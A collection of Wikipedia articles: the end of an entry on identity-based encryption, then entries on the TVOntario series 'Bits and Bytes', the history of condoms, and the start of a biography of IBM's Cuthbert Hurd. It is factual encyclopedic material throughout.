The issue of implicit key escrow does not exist with the current PKI system, wherein private keys are usually generated on the user's computer. Depending on the context, key escrow can be seen as a positive feature (e.g., within enterprises). A number of variant systems have been proposed which remove the escrow, including certificate-based encryption, secret sharing, secure key issuing cryptography and certificateless cryptography.
A secure channel between a user and the Private Key Generator (PKG) is required for transmitting the private key on joining the system. Here, an SSL-like connection is a common solution for a large-scale system. It is important to observe that users who hold accounts with the PKG must be able to authenticate themselves. In principle, this may be achieved through a username and password or through public key pairs managed on smart cards.
IBE solutions may rely on cryptographic techniques that are insecure against attacks by code-breaking quantum computers (see Shor's algorithm).
See also
ID-based cryptography
Identity-based conditional proxy re-encryption
Attribute-based encryption
References
External links
Seminar 'Cryptography and Security in Banking'/'Alternative Cryptology', Ruhr University Bochum, Germany
RFC 5091 - the IETF RFC defining two common IBE algorithms
HP Role-Based Encryption
The Pairing-Based Crypto Lounge
The Voltage Security Network - IBE encryption web service
Analyst report on the cost of IBE versus PKI
Public-key cryptography
Identity-based cryptography
fr:Schéma basé sur l'identité
ko:신원 기반 암호
ja:IDベース暗号
|
5459698
|
https://en.wikipedia.org/wiki/Bits%20and%20Bytes
|
Bits and Bytes
|
Bits and Bytes was the name of two Canadian educational television series produced by TVOntario that taught the basics of how to use a personal computer.
The first series, made in 1983, starred Luba Goy as the Instructor and Billy Van as the Student. Bits and Bytes 2 was produced in 1991 and starred Billy Van as the Instructor and Victoria Stokle as the Student. The Writer-Producers of both Bits and Bytes and Bits and Bytes 2 were Denise Boiteau & David Stansfield.
Title sequence
The intro sequence featured a montage of common computer terms such as "ERROR", "LOGO" and "ROM", as well as various snippets of simple computer graphics and video effects, accompanied by a theme song that borrows heavily from the 1978 song "Neon Lights" by Kraftwerk.
Series format
The first series featured an unusual presentation format whereby Luba Goy, as the instructor, would address Billy Van through a remote video link. The video link appeared on a projection screen in front of Luba, who was seated in an office. She was then able to direct Billy, who appeared on a soundstage with various desktop computer setups of the era. Popular systems emphasized included the Atari 800, Commodore PET, Tandy TRS-80, and Apple II. Each episode also included short animated vignettes to explain key concepts, as well as videotaped segments on various developments in computing.
In 1983 TVOntario included the show's episodes as part of a correspondence course. The original broadcasts on TVOntario also had a companion series, The Academy, that was scheduled immediately afterward in which Bits and Bytes technology consultant, Jim Butterfield, appeared as co-host to further elaborate on the concepts introduced in the main series.
Bits and Bytes 2
In the second Bits and Bytes series, produced almost a decade later, Billy Van assumed the role of instructor and taught a new female student. The new series focused primarily on IBM PC compatibles (i.e. Intel-based 286 or 386 computers) running DOS and early versions of Windows, as well as the newer and updated technologies of that era. For that series, a selection of the original's animated spots was re-aired to illustrate fundamental computer technology principles, along with a number of new spots covering newly emerged concepts such as advances in computer graphics and data management.
Although the possibility of a Bits and Bytes 3 was suggested at the end of the second series, TVOntario eventually elected instead to rebroadcast the Knowledge Network computer series, Dotto's Data Cafe, as a more economical and extensive production on the same subject.
Episodes (1983-84)
Program 1: Getting Started
Program 2: Ready-Made Programs
Program 3: How Programs Work?
Program 4: File & Data Management
Program 5: Communication Between Computers
Program 6: Computer Languages
Program 7: Computer-Assisted Instruction
Program 8: Games & Simulations
Program 9: Computer Graphics
Program 10: Computer Music
Program 11: Computers at Work
Program 12: What Next?
Episodes (1991)
Program 1: Basics
Program 2: Words
Program 3: Numbers
Program 4: Files
Program 5: Messages
Program 6: Pictures
Crew
Original Music - Harry Forbes, George Axon
Animation Voice - Fred Napoli
Animation - Grafilm Productions Inc.
Consultants - Jim Butterfield, David Humphreys, Mike H. Stein, Jo Ann Wilton
Unit Manager - Rodger Lawson
Production Editors - Michael Kushner, Paul Spencer, Brian Elston, Doug Beavan
Production Assistant - George Pyron
Executive Producer - Mike McManus
Director - Stu Beecroft
Written & Produced by - Denise Boiteau and David Stansfield
References
External links
TVOntario's official (but incomplete) archive of the original series via the Internet Archive's Wayback Machine
Complete archive of the original series on YouTube, including episodes and standalone clips of all of the animations and interviews
Fansite with more information about the show
1983 Canadian television series debuts
1991 Canadian television series debuts
TVOntario original programming
Television shows filmed in Toronto
Computer television series
1980s Canadian children's television series
1990s Canadian children's television series
|
18053246
|
https://en.wikipedia.org/wiki/History%20of%20condoms
|
History of condoms
|
The history of condoms goes back at least several centuries, and perhaps beyond. For most of their history, condoms have been used both as a method of birth control, and as a protective measure against venereal (sexually transmitted) diseases such as syphilis, gonorrhea, chlamydia, hepatitis B and more recently HIV/AIDS. Condoms have been made from a variety of materials; prior to the 19th century, chemically treated linen and animal tissue (intestine or bladder) are the best documented varieties. Rubber condoms gained popularity in the mid-19th century, and in the early 20th century major advances were made in manufacturing techniques. Prior to the introduction of the combined oral contraceptive pill, condoms were the most popular birth control method in the Western world. In the second half of the 20th century, the low cost of condoms contributed to their importance in family planning programs throughout the developing world. Condoms have also become increasingly important in efforts to fight the AIDS pandemic. The oldest condoms ever excavated were found in a cesspit located in the grounds of Dudley Castle and were made from animal membrane. The condoms dated back to as early as 1642.
Antiquity to the Middle Ages for sex
Whether condoms were used in ancient civilizations is debated by archaeologists and historians. Societies in the ancient civilizations of Egypt, Greece, and Rome preferred small families and are known to have practiced a variety of birth control methods. However, these societies viewed birth control as a woman's responsibility, and the only well-documented contraception methods were female-controlled devices (both possibly effective, such as pessaries, and ineffective, such as amulets). The writings of these societies contain "veiled references" to male-controlled contraceptive methods that might have been condoms, but most historians interpret them as referring to coitus interruptus or anal intercourse.
The loincloths worn by Egyptian and Greek laborers were very sparse, sometimes consisting of little more than a covering for the glans of the penis. Records of these types of loincloths being worn by men in higher classes have made some historians speculate they were worn during intercourse; others, however, are doubtful of such interpretations. Historians may also cite one legend of Minos, related by Antoninus Liberalis in 150 AD, as suggestive of condom use in ancient societies. This legend describes a curse that caused Minos' semen to contain serpents and scorpions. To protect his sexual partner from these animals, Minos used a goat's bladder as a female condom.
Contraceptives fell out of use in Europe after the decline of the Western Roman Empire in the 5th century; the use of contraceptive pessaries, for example, is not documented again until the 15th century. If condoms were used during the Roman Empire, knowledge of them may have been lost during its decline. In the writings of Muslims and Jews during the Middle Ages, there are some references to attempts at male-controlled contraception, including suggestions to cover the penis in tar or soak it in onion juice. Some of these writings might describe condom use, but they are "oblique", "veiled", and "vague".
1500s to the 1800s
Renaissance
Prior to the 15th century, some use of glans condoms (devices covering only the head of the penis) is recorded in Asia. Glans condoms seem to have been used for birth control, and to have been known only by members of the upper classes. In China, glans condoms may have been made of oiled silk paper, or of lamb intestines. In Japan, they were made of tortoise shell or animal horn.
The first well-documented outbreak of what is now known as syphilis occurred in 1494 among French troops. The disease then swept across Europe. As Jared Diamond describes it, "when syphilis was first definitely recorded in Europe in 1495, its pustules often covered the body from the head to the knees, caused flesh to fall from people's faces, and led to death within a few months." (The disease is less frequently fatal today.) By 1505, the disease had spread to Asia, and within a few decades had "decimated large areas of China".
In 16th-century Italy, Gabriele Falloppio authored the earliest uncontested description of condom use. De Morbo Gallico ("The French Disease", referring to syphilis) was published in 1564, two years after Falloppio's death. In this tract, he recommended use of a device he claimed to have invented: linen sheaths soaked in a chemical solution and allowed to dry before use. The cloths he described were sized to cover the glans of the penis, and were held on with a ribbon. Falloppio claimed to have performed an experimental trial of the linen sheath on 1100 men, and reported that none of them had contracted the dreaded disease.
After the publication of De Morbo Gallico, use of penis coverings to protect from disease is described in a wide variety of literature throughout Europe. The first indication these devices were used for birth control, rather than disease prevention, is the 1605 theological publication De iustitia et iure (On justice and law) by Catholic theologian Leonardus Lessius: he condemned them as immoral. The first explicit description that un petit linge (a small cloth) was used to prevent pregnancy is from 1655: a French novel and play titled L'Escole des Filles (The Philosophy of Girls). In 1666, the English Birth Rate Commission attributed a recent downward fertility rate to use of "condons", the first documented use of that word (or any similar spelling).
In addition to linen, condoms during the Renaissance were made out of intestines and bladder. Cleaned and prepared intestine for use in glove making had been sold commercially since at least the 13th century. Condoms made from bladder and dating to the 1640s were discovered in an English privy; it is believed they were used by soldiers of King Charles I. Dutch traders introduced condoms made from "fine leather" to Japan. Unlike the horn condoms used previously, these leather condoms covered the entire penis.
18th century
Written references to condom use became much more common during the 18th century. Not all of the attention was positive: in 1708, John Campbell unsuccessfully asked Parliament to make the devices illegal. Noted English physician Daniel Turner condemned the condom, publishing his arguments against their use in 1717. He disliked condoms because they did not offer full protection against syphilis. He also seems to have argued that belief in the protection condoms offered encouraged men to engage in sex with unsafe partners - but then, because of the loss of sensation caused by condoms, these same men often neglected to actually use the devices. The French medical professor Jean Astruc wrote his own anti-condom treatise in 1736, citing Turner as the authority in this area. Physicians later in the 18th century also spoke against the condom, but not on medical grounds: rather, they expressed the belief that contraception was immoral.
The condom market grew rapidly, however. 18th-century condoms were available in a variety of qualities and sizes, made from either linen treated with chemicals, or "skin" (bladder or intestine softened by treatment with sulphur and lye). They were sold at pubs, barbershops, chemist shops, open-air markets, and at the theatre throughout Europe and Russia. The first recorded inspection of condom quality is found in the memoirs of Giacomo Casanova (which cover his life until 1774): to test for holes, he would often blow them up before use.
Couples in colonial America relied on female-controlled methods of contraception if they used contraceptives at all. The first known documents describing American condom use were written around 1800, two to three decades after the American Revolutionary War. Also around 1800, linen condoms lost popularity in the market and their production ceased: they were more expensive and were viewed as less comfortable when compared to skin condoms.
Up to the 19th century, condoms were generally used only by the middle and upper classes. Perhaps more importantly, condoms were unaffordable for many: for a typical prostitute, a single condom might cost several months' pay.
Expanded marketing and introduction of rubber
The early 19th century saw contraceptives promoted to the poorer classes for the first time: birth control advocates in England included Jeremy Bentham and Richard Carlile, and noted American advocates included Robert Dale Owen and Charles Knowlton. Writers on contraception tended to prefer other methods of birth control, citing both the expense of condoms and their unreliability (they were often riddled with holes, and often fell off or broke), but they discussed condoms as a good option for some, and as the only contraceptive that also protected from disease. One group of British contraceptive advocates distributed condom literature in poor neighborhoods, with instructions on how to make the devices at home; in the 1840s, similar tracts were distributed in both cities and rural areas through the United States.
From the 1820s through the 1870s, popular women and men lecturers traveled around America teaching about physiology and sexual matters. Many of them sold birth control devices, including condoms, after their lectures. They were condemned by many moralists and medical professionals, including America's first female doctor Elizabeth Blackwell. Blackwell accused the lecturers of spreading doctrines of "abortion and prostitution". In the 1840s, advertisements for condoms began to appear in British newspapers, and in 1861 a condom advertisement appeared in the New York Times.
The discovery of the rubber vulcanization process is disputed. Some contend that it was invented by Charles Goodyear in America in 1839 and patented in 1844; other accounts attribute it to Thomas Hancock in Britain in 1843. The first rubber condom was produced in 1855, and by the late 1850s several major rubber companies were mass-producing, among other items, rubber condoms. A main advantage of rubber condoms was their reusability, making them a more economical choice in the long term. Compared to the 19th-century rubber condoms, however, skin condoms were initially cheaper and offered better sensitivity. For these reasons, skin condoms remained more popular than the rubber variety. However, by the end of the 19th century "rubber" had become a euphemism for condoms in countries around the world. For many decades, rubber condoms were manufactured by wrapping strips of raw rubber around penis-shaped moulds, then dipping the wrapped moulds in a chemical solution to cure the rubber. The earliest rubber condoms covered only the glans of the penis; a doctor had to measure each man and order the correct size. Even with the medical fittings, however, glans condoms tended to fall off during use. Rubber manufacturers quickly discovered they could sell more devices by manufacturing full-length one-size-fits-all condoms to be sold in pharmacies.
Increased popularity despite legal impediments
Distribution of condoms in the United States was limited by passage of the Comstock laws, which included a federal act banning the mailing of contraceptive information (passed in 1873) as well as State laws that banned the manufacture and sale of condoms in thirty states. In Ireland the 1889 Indecent Advertisements Act made it illegal to advertise condoms, although their manufacture and sale remained legal. Contraceptives were illegal in 19th-century Italy and Germany, but condoms were allowed for disease prevention. In Great Britain it was forbidden to sell condoms as prophylactics under the 1917 VD act, so they were marketed as contraceptives rather than as prophylactics, as they were in America. Despite legal obstacles, condoms continued to be readily available in both Europe and America, widely advertised under euphemisms such as male shield and rubber good. In late-19th-century England, condoms were known as "a little something for the weekend". The phrase was commonly used in barbershops, which were a key retailer of condoms, in twentieth century Britain. Only in the Republic of Ireland were condoms effectively outlawed. In Ireland their sale and manufacture remained illegal until the 1970s.
Opposition to condoms did not only come from moralists: by the late 19th century many feminists expressed distrust of the condom as a contraceptive, as its use was controlled and decided upon by men alone. They advocated instead for methods which were controlled by women, such as diaphragms and spermicidal douches. Despite social and legal opposition, at the end of the 19th century the condom was the Western world's most popular birth control method. Two surveys conducted in New York in 1890 and 1900 found that 45% of the women surveyed were using condoms to prevent pregnancy. A survey in Boston just prior to World War I concluded that three million condoms were sold in that city every year.
1870s England saw the founding of the first major condom manufacturing company, E. Lambert and Son of Dalston. In 1882, German immigrant Julius Schmidt founded one of the largest and longest-lasting condom businesses, Julius Schmid, Inc. (he dropped the 't' from his name in an effort to appear less Jewish). This New York business initially manufactured only skin condoms (in 1890 he was arrested by Anthony Comstock for having almost seven hundred of the devices in his house). In 1912, a German named Julius Fromm developed a new, improved manufacturing technique for condoms: dipping glass molds into a raw rubber solution. Called cement dipping, this method required adding gasoline or benzene to the rubber to make it liquid. In America, Schmid was the first company to use the new technique. Using the new dipping method, French condom manufacturers were the first to add textures to condoms. Fromm was the first company to sell a branded line of condoms, Fromm's Act, which remains popular in Germany today. The Fromm company was taken over by the Nazis during the war, and the family fled to Great Britain but could not compete against the powerful London Rubber Company. Schmid's condom lines, Sheiks and Ramses, were sold through the late 1990s. Youngs Rubber Company, founded by Merle Youngs in late-19th-century America, introduced Trojans.
Beginning in the second half of the 19th century, American rates of sexually transmitted diseases skyrocketed. Causes cited by historians include effects of the American Civil War, and the ignorance of prevention methods promoted by the Comstock laws. To fight the growing epidemic, sexual education classes were introduced to public schools for the first time, teaching about venereal diseases and how they were transmitted. They generally taught that abstinence was the only way to avoid sexually transmitted diseases. The medical community and moral watchdogs considered STDs to be punishment for sexual misbehavior. The stigma on victims of these diseases was so great that many hospitals refused to treat people who had syphilis.
1900 to present
World War I to the 1920s
The German military was the first to promote condom use among its soldiers, beginning in the second half of the 19th century. Early-20th-century experiments by the American military concluded that providing condoms to soldiers significantly lowered rates of sexually transmitted diseases. During World War I, the United States and (at the beginning of the war only) Britain were the only countries with soldiers in Europe who did not provide condoms and promote their use, although some condoms were provided as an experiment by the British Navy. By the end of the war, the American military had diagnosed almost 400,000 cases of syphilis and gonorrhea, a historic high.
From just before 1900 to the beginning of World War I, almost all condoms used in Europe were imported from Germany. Germany not only exported condoms to other European countries, but was a major supplier to Australia, New Zealand, and Canada. During the war, the American companies Schmid and Youngs became the main suppliers of condoms to the European Allies. By the early 1920s, however, most of Europe's condoms were once again made in Germany.
In 1918, just before the end of the war, an American court overturned a conviction against Margaret Sanger. In this case, the judge ruled that condoms could be legally advertised and sold for the prevention of disease. There were still a few state laws against buying and selling contraceptives, and advertising condoms as birth control devices remained illegal in over thirty states. But condoms began to be publicly, legally sold to Americans for the first time in forty-five years. Through the 1920s, catchy names and slick packaging became an increasingly important marketing technique for many consumer items, including condoms and cigarettes. Quality testing became more common, involving filling each condom with air followed by one of several methods intended to detect loss of pressure. Several American companies sold their rejects under cheaper brand names rather than discarding them. Consumers were advised to perform similar tests themselves before use, although few actually did so. Worldwide, condom sales doubled in the 1920s.
Still, there were many prominent opponents of condoms. Marie Stopes objected to the use of condoms, ostensibly for medical reasons. Founder of psychoanalysis Sigmund Freud opposed all methods of birth control on the grounds that their failure rates were too high, and was especially opposed to the condom because it cut down on sexual pleasure. Some feminists continued to oppose male-controlled contraceptives such as condoms. Many moralists and medical professionals opposed all methods of contraception. In 1920 the Church of England's Lambeth Conference condemned all "unnatural means of conception avoidance." London's Bishop Arthur Winnington-Ingram complained of the number of condoms discarded in alleyways and parks, especially after weekends and holidays.
In the U.S., condom advertising was legally restricted to their use as disease preventatives. They could be openly marketed as birth control devices in Britain, but purchasing condoms in Britain was socially awkward compared to the U.S. They were generally requested with the euphemism "a little something for the weekend." Boots, the largest pharmacy chain in Britain, stopped selling condoms altogether in the 1920s, a policy that was not reversed until the 1960s. In post-World War I France, the government was concerned about falling birth rates. In response, it outlawed all contraceptives, including condoms. Contraception was also illegal in Spain. European militaries continued to provide condoms to their members for disease protection, even in countries where they were illegal for the general population.
Invention of latex and manufacturing automation
Latex, rubber suspended in water, was invented in 1920. Youngs Rubber Company was the first to manufacture a latex condom, an improved version of their Trojan brand. Latex condoms required less labor to produce than cement-dipped rubber condoms, which had to be smoothed by rubbing and trimming. Because it used water to suspend the rubber instead of gasoline and benzene, it eliminated the fire hazard previously associated with all condom factories. Latex condoms also performed better for the consumer: they were stronger and thinner than rubber condoms, and had a shelf life of five years (compared to three months for rubber). Europe's first latex condom was an export from Youngs Rubber Company in 1929. In 1932 the London Rubber Company, which had previously served as a wholesaler for German-manufactured condoms, became Europe's first manufacturer of latex condoms, the Durex. The Durex plant was designed and installed by Lucian Landau, a Polish rubber technology student living in London.
Until the twenties, all condoms were individually hand-dipped by semi-skilled workers. Throughout the 1920s, advances were made in the automation of condom assembly lines. Fred Killian patented the first fully automated line in 1930 and installed it in his manufacturing plant in Akron, Ohio. Killian charged $20,000 for his conveyor system, as much as $2 million in today's dollars. Automated lines dramatically lowered the price of condoms. Major condom manufacturers bought or leased conveyor systems, and small manufacturers were driven out of business. The skin condom, now significantly more expensive than the latex variety, became restricted to a niche high-end market. In Britain, the London Rubber Company's fully automated plant was designed in-house by Lucian Landau and the first lines were installed from 1950 onward.
Great Depression
In 1927, senior medical officers in the American military began promoting condom distribution and educational programs to members of the army and navy. By 1931, condoms were standard issue to all members of the U.S. military. This coincided with a steep decline in U.S. military cases of sexually transmitted disease. The U.S. military was not the only large organization that changed its moral stance on condoms: in 1930 the Anglican Church's Lambeth Conference sanctioned the use of birth control by married couples. In 1931 the Federal Council of Churches in the U.S. issued a similar statement.
The Roman Catholic Church responded by issuing the encyclical Casti connubii affirming its opposition to all contraceptives, a stance it has never reversed. Semen analysis was first performed in the 1930s. Samples were typically collected by masturbation, another action opposed by the Catholic Church. In 1930s Spain, the first use of collection condoms was documented; holes put in the condom allowed the user to collect a sample without violating the prohibitions on contraception and masturbation.
In 1932, Margaret Sanger arranged for a shipment of diaphragms to be mailed from Japan to a sympathetic doctor in New York City. When U.S. customs confiscated the package as illegal contraceptive devices, Sanger helped file a lawsuit. In 1936, a federal appeals court ruled in United States v. One Package of Japanese Pessaries that the federal government could not interfere with doctors providing contraception to their patients. In 1938, over three hundred birth control clinics opened in America, supplying reproductive care (including condoms) to poor women all over the country. Programs led by U.S. Surgeon General Thomas Parran included heavy promotion of condoms. These programs are credited with a steep drop in the U.S. STD rate by 1940.
Two of the few places where condoms became more restricted during this period were Fascist Italy and Nazi Germany. Because of government concern about low birth rates, contraceptives were made illegal in Italy in the late 1920s. Although limited and highly controlled sales as disease preventatives were still allowed, there was a brisk black market trade in condoms as birth control. In Germany, laws passed in 1933 mandated that condoms could only be sold in plain brown wrappers, and only at pharmacies. Despite these restrictions, when World War II began Germans were using 72 million condoms every year. The elimination of moral and legal barriers, and the introduction of condom programs by the U.S. government helped condom sales. However, these factors alone are not considered to explain the Great Depression's booming condom industry. In the U.S. alone, more than 1.5 million condoms were used every day during the Depression, at a cost of over $33 million per year (not adjusted for inflation). One historian explains these statistics this way: "Condoms were cheaper than children." During the Depression condom lines by Schmid gained in popularity: that company still used the cement-dipping method of manufacture. Unlike the latex variety, these condoms could be safely used with oil-based lubricants. And while less comfortable, older-style rubber condoms could be reused and so were more economical, a valued feature in hard times.
More attention was brought to quality issues in the 1930s. In 1935, a biochemist tested 2000 condoms by filling each one with air and then water: he found that 60% of them leaked. The condom industry estimated that only 25% of condoms were tested for quality before packaging. The media attention led the U.S. Food and Drug Administration to classify condoms as a drug in 1937 and mandate that every condom be tested before packaging. Youngs Rubber Company was the first to institute quality testing of every condom they made, installing automatic testing equipment designed by Arthur Youngs (the owner's brother) in 1938. The Federal Food, Drug, and Cosmetic Act authorized the FDA to seize defective products; the first month the Act took effect in 1940, the FDA seized 864,000 condoms. While these actions improved the quality of condoms in the United States, American condom manufacturers continued to export their rejects for sale in foreign markets.
World War II to 1980
During World War II condoms were not only distributed to male U.S. military members, but enlisted men were also subject to significant contraception propaganda in the form of films, posters, and lectures. A number of slogans were coined by the military, with one film exhorting "Don't forget — put it on before you put it in." African-American soldiers, who served in segregated units, were exposed to less of the condom promotion programs, had lower rates of condom usage, and much higher rates of STDs. America's female military units, the WACs and WAACs, were still engaged with abstinence programs. European and Asian militaries on both sides of the conflict also provided condoms to their troops throughout the war, even Germany which outlawed all civilian use of condoms in 1941. Despite the rubber shortages that occurred during this period, condom manufacturing was never restricted. In part because condoms were readily available, soldiers found a number of non-sexual uses for the devices, many of which continue to be utilized to this day.
Post-war American troops in Germany continued to receive condoms and materials promoting their use. Nevertheless, rates of STDs in this population began to rise, reaching the highest levels since World War I. One explanation is that the success of newer penicillin treatments led soldiers to take syphilis and gonorrhea much less seriously. A similar casual attitude toward STDs appeared in the general American population; one historian states that condoms "were almost obsolete as prophylaxis by 1960". By 1947, the U.S. military was again promoting abstinence as the only method of disease control for its members, a policy that continued through the Vietnam War.
But condom sales continued to grow. From 1955 to 1965, 42% of Americans of reproductive age relied on condoms for birth control. In Britain from 1950 to 1960, 60% of married couples used condoms. For the more economical-minded, cement-dipped condoms continued to be available long after the war. In 1957, Durex introduced the world's first lubricated condom. Beginning in the 1960s, the Japanese used more condoms per capita than any other nation in the world. The birth control pill became the world's most popular method of birth control in the years after its 1960 debut, but condoms remained a strong second. A survey of British women between 1966 and 1970 found that the condom was the most popular birth control method with single women. New manufacturers appeared in the Soviet Union, which had never restricted condom sales. The U.S. Agency for International Development pushed condom use in developing countries to help solve the "world population crises": by 1970 hundreds of millions of condoms were being used each year in India alone.
In the 1960s and 1970s quality regulations tightened, and legal barriers to condom use were removed. In 1965, the U.S. Supreme Court case Griswold v. Connecticut struck down one of the remaining Comstock laws, the bans on contraception in Connecticut and Massachusetts. France repealed its anti-birth control laws in 1967. Similar laws in Italy were declared unconstitutional in 1971. Captain Beate Uhse in Germany founded a birth control business, and fought a series of legal battles to continue her sales. In Ireland, legal condom sales (only to people over 18, and only in clinics and pharmacies) were allowed for the first time in 1978. (All restrictions on Irish condom sales were lifted in 1993.)
Advertising was one area that continued to have legal restrictions. In the late 1950s, the American National Association of Broadcasters banned condom advertisements from national television. This policy remained in place until 1979, when the U.S. Justice department had it overturned in court. In the U.S., advertisements for condoms were mostly limited to men's magazines such as Penthouse. The first television ad, on the California station KNTV, aired in 1975: it was quickly pulled after it attracted national attention. And in over 30 states, advertising condoms as birth control devices was still illegal.
After the discovery of AIDS
The first New York Times story on acquired immunodeficiency syndrome (AIDS) was published on July 3, 1981. In 1982 it was first suggested that the disease was sexually transmitted. In response to these findings, and to fight the spread of AIDS, the U.S. Surgeon General Dr. C. Everett Koop supported condom promotion programs. However, President Ronald Reagan preferred an approach of concentrating only on abstinence programs. Some opponents of condom programs stated that AIDS was a disease of homosexuals and illicit drug users, who were just getting what they deserved. In 1990, North Carolina senator Jesse Helms argued that the best way to fight AIDS would be to enforce state sodomy laws.
Nevertheless, major advertising campaigns were put in print media, promoting condoms as a way to protect against AIDS. Youngs Rubber mailed educational pamphlets to American households, although the postal service forced them to go to court to do so, citing a section of Title 39 that "prohibits the mailing of unsolicited advertisements for contraceptives." In 1983 the U.S. Supreme Court held that the postal service's actions violated the free speech clause of the First Amendment. Beginning in 1985 through 1987, national condom promotion campaigns occurred in U.S. and Europe. Over the 10 years of the Swiss campaign, Swiss condom use increased by 80%. The year after the British campaign began, condom sales in the UK increased by 20%. In 1988 Britain, condoms were the most popular birth control choice for married couples, for the first time since the introduction of the pill. The first condom commercial on U.S. television aired during an episode of Herman's Head on November 17, 1991. In the U.S. in the 1990s, condoms ranked third in popularity among married couples, and were a strong second among single women.
Condoms began to be sold in a wider variety of retail outlets, including in supermarkets and in discount department stores such as Wal-Mart. In this environment of more open sales, the British euphemism of "a little something for the weekend" fell out of use. In June 1991 America's first condom store, Condomania, opened on Bleecker Street in New York City. Condomania was the first store of its kind in North America dedicated to the sale and promotion of condoms in an upbeat, upscale and fun atmosphere. Condomania was also one of the first retailers to offer condoms online when it launched its website in December 1995.
Condom sales increased every year until 1994, when media attention to the AIDS pandemic began to decline. In response, manufacturers have changed the tone of their advertisements from scary to humorous. New developments continue to occur in the condom market, with the first polyurethane condom—branded Avanti and produced by the manufacturer of Durex—introduced in the 1990s. Durex was also the first condom brand to have a website, launched in 1997. Worldwide condom use is expected to continue to grow: one study predicted that developing nations would need 18.6 billion condoms in 2015.
Etymology and other terms
Etymological theories for the word "condom" abound. By the early 18th century, the invention and naming of the condom was attributed to an associate of England's King Charles II, and this explanation persisted for several centuries. However, the "Dr. Condom" or "Earl of Condom" described in these stories has never been proved to exist, and condoms had been used for over one hundred years before King Charles II acceded to the throne.
A variety of Latin etymologies have been proposed, including condon (receptacle), along with other Latin words meaning "house" and "scabbard or case". It has also been speculated to derive from an Italian word meaning glove. William E. Kruck wrote an article in 1981 concluding that, "As for the word 'condom', I need state only that its origin remains completely unknown, and there ends this search for an etymology." Modern dictionaries may also list the etymology as "unknown".
Other terms are also commonly used to describe condoms. In North America condoms are also commonly known as prophylactics, or rubbers. In Britain they may be called French letters. Additionally, condoms may be referred to using the manufacturer's name. The insult term scumbag was originally a slang word for condom.
Major manufacturers
One analyst described the size of the condom market as something that "boggles the mind". Numerous small manufacturers, nonprofit groups, and government-run manufacturing plants exist around the world. Within the condom market, there are several major contributors, among them both for-profit businesses and philanthropic organizations.
In 1882, German immigrant Julius Schmidt founded one of the largest and longest-lasting condom businesses, Julius Schmid, Inc., based in New York City. The condom lines manufactured by Schmid included Sheiks and Ramses. In 1932, the London Rubber Company (which had previously been a wholesale business importing German condoms) began to produce latex condoms, under the Durex brand. In 1962 Schmid was purchased by London Rubber. In 1987, London Rubber began acquiring other condom manufacturers, and within a few years became an important international company. In the late 1990s, London Rubber (by then London International Limited) merged all the Schmid brands into its European brand, Durex. Soon after, London International was purchased by Seton Scholl Healthcare (manufacturer of Dr. Scholl's footcare products), forming Seton Scholl Limited.
Youngs Rubber Company, founded by Merle Youngs in late-19th-century America, introduced the Trojan line of condoms. In 1985, Youngs Rubber Company was sold to Carter-Wallace. The Trojan name switched hands yet again in 2000 when Carter-Wallace was sold to Church and Dwight.
The Australian division of Dunlop Rubber began manufacturing condoms in the 1890s. In 1905, Dunlop sold its condom-making equipment to one of its employees, Eric Ansell, who founded Ansell Rubber. In 1969, Ansell was sold back to Dunlop. In 1987, English business magnate Richard Branson contracted with Ansell to help in a campaign against HIV and AIDS. Ansell agreed to manufacture the Mates brand of condom, to be sold at little or no profit in order to encourage condom use. Branson soon sold the Mates brand to Ansell, with royalty payments made annually to the charity Virgin Unite. In addition to its Mates brand, Ansell currently manufactures Lifestyles and Lifesan for the U.S. market.
In 1934 the Kokusai Rubber Company was founded in Japan. It is now known as the Okamoto Rubber Manufacturing Company.
In 1970 Tim Black and Philip Harvey founded Population Planning Associates (now known as Adam & Eve). Population Planning Associates was a mail-order business that marketed condoms to American college students, despite U.S. laws against sending contraceptives through the mail. Black and Harvey used the profits from their company to start a non-profit organization Population Services International. By 1975, PSI was marketing condoms in Kenya and Bangladesh, and today operates programs in over sixty countries. Harvey left his position as PSI's director in the late 1970s, but in the late 1980s again founded a nonprofit company, DKT International. Named after D.K. Tyagi (a leader of family planning programs in India), DKT International annually sells millions of condoms at discounted rates in developing countries around the world. By selling the condoms instead of giving them away, DKT intends to make its customers invested in using the devices. One of DKT's more notable programs is its work in Ethiopia, where soldiers are required to carry a condom every time they leave base. The rate of HIV infection in the Ethiopian military, about 5%, is believed to be the lowest among African militaries.
In 1987, Tufts University students Davin Wedel and Adam Glickman started Global Protection Corp. in response to C. Everett Koop's statement that "a condom can save your life." Since that time, Global Protection Corp. has become known for its innovative approach to condom marketing and its support of more than 3500 non-profit organizations worldwide. The company has numerous patents and trademarks to its name, including the only FDA-approved glow-in-the-dark condom, the Pleasure Plus condom and the original condom keychain. In 2005 the company introduced its newest product, One Condoms, a reinvention of retail condom brands combining sleek metal packaging, distinctive condom wrappers and innovative marketing programs. In South Africa, some manufacturers have considered introducing an extra-large variety of condoms after several complaints from South African men claiming the condoms were too small and causing discomfort.
References
Condoms
Condoms
Condoms
|
16949704
|
https://en.wikipedia.org/wiki/Cuthbert%20Hurd
|
Cuthbert Hurd
|
Cuthbert Corwin Hurd (April 5, 1911 – May 22, 1996) was an American computer scientist and entrepreneur, who was instrumental in helping the International Business Machines Corporation develop its first general-purpose computers.
Life
Hurd was born April 5, 1911, in Estherville, Iowa. He received his B.A. in mathematics from Drake University in 1932, his M.S. in mathematics from Iowa State College in 1934, and his Ph.D. in mathematics from the University of Illinois in 1936. Waldemar Joseph Trjitzinsky was his advisor, and his dissertation was Asymptotic theory of linear differential equations singular in the variable of differentiation and in a parameter.
He did post-doctorate work at Columbia University and the Massachusetts Institute of Technology (MIT).
He was assistant professor at Michigan State University from 1936 to 1942.
During World War II Hurd taught at the US Coast Guard Academy with the rank of Lieutenant Commander, and co-authored the textbook for teaching Mathematics to mariners. From 1945 to 1947 he was dean of Allegheny College.
In 1947 he moved to Oak Ridge, Tennessee, where he worked for Union Carbide as a mathematician at the United States Atomic Energy Commission facility Oak Ridge National Laboratory. He taught and later served as a technical research head under Alston Scott Householder. At Oak Ridge he supervised the installation of an IBM 602 calculating punched card machine to automate the tracking of material in the facility, and saw the potential for automating the massive amounts of computation needed for nuclear physics research. In February 1948 he was invited to the dedication of the IBM Selective Sequence Electronic Calculator (SSEC), a custom-built machine in New York City. He asked if the SSEC could be used for calculations being done at Oak Ridge for the NEPA project to power an airplane with a nuclear reactor, but the demand for the SSEC produced a backlog. In the meantime, he requested that the first IBM 604 calculating card punch be delivered to Oak Ridge. It was, but the calculations remained slow with the limited electronics in the 604.
IBM
From 1949 to 1962, he worked at IBM, where he founded the Applied Science Department and pushed reluctant management into the world of computing.
